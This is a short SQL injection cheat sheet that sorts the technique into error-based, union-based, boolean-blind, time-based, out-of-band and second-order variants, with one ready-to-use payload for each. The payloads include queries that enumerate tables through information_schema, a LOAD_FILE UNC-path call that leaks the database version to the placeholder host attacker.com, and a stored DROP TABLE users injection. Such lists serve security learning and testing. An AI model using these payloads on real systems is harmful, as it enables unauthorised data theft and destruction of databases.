SQL Injection (SQLi)

1. Classic (In-Band) — Results appear directly in app response

   1. Error-based — Exploits DB errors to extract data

      • Triggers a conversion error, leaking table names.

      ' OR 1=CONVERT(0, (SELECT table_name FROM information_schema.tables LIMIT 1)) -- -

   2. Union-based — Uses UNION to combine results from injected queries with legitimate ones

      • Appends query results to the original output.

      ' UNION SELECT 1, table_name, 3 FROM information_schema.tables WHERE table_schema = database() -- -

2. Blind — No direct data in the response, results are inferred

   1. Boolean-based — Relies on true/false conditions

      • Checks if the first character of the MySQL version is '5' (true/false response).

      ' AND (SELECT SUBSTRING(@@version,1,1)) = '5' -- -

   2. Time-based — Uses delays to confirm vulnerabilities

      • Delays response by 5 seconds if the condition is true.

      ' AND IF(1=1, SLEEP(5), 0) -- -

3. Out-of-band — Relies on external network calls to exfiltrate data, requires DBMS support for outbound requests.

   • Forces the database to make a DNS or HTTP request to an attacker-controlled server, leaking data (e.g., MySQL version) in the request.

   ' + (SELECT LOAD_FILE(CONCAT('\\\\', @@version, '.attacker.com\\share\\'))) -- -

4. 2nd Order — Malicious input is stored and executed later

   • Store payload. E.g. in a comment field:

   '; DROP TABLE users; -- -

   • Executes when the comment is processed later:

   INSERT INTO comments (user, text) VALUES ('hacker', 'Legit comment'); DROP TABLE users; -- -');